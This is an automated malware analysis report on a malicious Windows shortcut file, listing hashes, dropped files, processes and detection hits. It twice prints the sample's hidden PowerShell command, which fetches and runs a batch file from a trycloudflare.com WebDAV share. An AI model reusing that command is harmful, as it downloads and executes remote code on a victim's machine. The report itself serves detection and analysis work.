Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

oSx8Pp4G8j.lnk

MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Mon Oct 28 21:04:21 2024, mtime=Mon Oct 28 21:04:21 2024, atime=Mon Oct 28 21:04:21 2024, length=450560, window=hidenormalshowminimized

initial sample

Details

Filetype:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Mon Oct 28 21:04:21 2024, mtime=Mon Oct 28 21:04:21 2024, atime=Mon Oct 28 21:04:21 2024, length=450560, window=hidenormalshowminimized
Entropy:	4.584334533263726
Filename:	oSx8Pp4G8j.lnk
Filesize:	1571
MD5:	872f688fe8f9a4d96e33e891a60651a9
SHA1:	8139d3786c4dd94103be12a563344799663c1ee7
SHA256:	e82d79751feb31a088cbd81afaa851541e00f1505a8c2677cf959a0ace4b544d
SHA512:	6d538732b8ae94a7237c7d17f3bfc217b8889c447e050e86f987e00679881169a66dbc04ff5af25a148da77a931839d2eeefb489a46154a5add265f59d2b8d1e
SSDEEP:	24:8IHJmddPjDvSw4pKl5bWTyMqJhUWnRdum2uG1YqVMXnab/rMTcm:8YJmTP+/uJHdp2bBGab4c
Preview:	L..................F.... ...K.jW.)..K.jW.)..K.jW.)...............................P.O. .:i.....+00.../C:\...................V.1....._Y.h..Windows.@........R.@_Y.h..............................W.i.n.d.o.w.s.....Z.1.....dY<...System32..B........R.@dY<.......

Signature Hits	Behavior Group	Mitre Attack
Multi AV Scanner detection for submitted file	AV Detection
Machine Learning detection for sample	AV Detection
Sample is known by Antivirus	System Summary

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Category:	dropped
Dump:	StartupProfileData-NonInteractive.1.dr
ID:	dr_3
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	1.1628158735648508
Encrypted:	false
Ssdeep:	3:Nlllul5mxllp:NllU4x/
Size:	64
Whitelisted:	false
Reputation:	moderate

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qc2td5lc.pgq.ps1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qc2td5lc.pgq.ps1
Category:	dropped
Dump:	__PSScriptPolicyTest_qc2td5lc.pgq.ps1.1.dr
ID:	dr_1
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Creates temporary files	System Summary

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujzk1rwm.l1i.psm1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujzk1rwm.l1i.psm1
Category:	dropped
Dump:	__PSScriptPolicyTest_ujzk1rwm.l1i.psm1.1.dr
ID:	dr_2
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\80ADMFM8FO600HA3U7QQ.temp

data

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\80ADMFM8FO600HA3U7QQ.temp
Category:	dropped
Dump:	80ADMFM8FO600HA3U7QQ.temp.1.dr
ID:	dr_0
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	3.7672290797401233
Encrypted:	false
Ssdeep:	48:jkA79tgPyy1XlLPSogZoAvyy1XlGPSogZo01:gA6f1XsHNf1X3H3
Size:	4599
Whitelisted:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms (copy)

data

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms (copy)
Category:	dropped
Dump:	80ADMFM8FO600HA3U7QQ.temp.1.dr
ID:	dr_4
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	3.7672290797401233
Encrypted:	false
Ssdeep:	48:jkA79tgPyy1XlLPSogZoAvyy1XlGPSogZo01:gA6f1XsHNf1X3H3
Size:	4599
Whitelisted:	false
Reputation:	low

Processes

Path

Cmdline

Malicious

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "iex '& \\yang-not-basically-loading.trycloudflare.com@SSL\DavWWWRoot\new.bat'"

Details

Is windows:	true
Is dropped:	false
PID:	7716
Target ID:	1
Parent PID:	3968
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "iex '& \\yang-not-basically-loading.trycloudflare.com@SSL\DavWWWRoot\new.bat'"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	03:43:12
Date:	13/11/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7b2bb0000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7724
Target ID:	2
Parent PID:	7716
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	03:43:12
Date:	13/11/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff620390000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
oSx8Pp4G8j.lnk

Files

Processes

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportoSx8Pp4G8j.lnk

Files

Processes

IOC Report
oSx8Pp4G8j.lnk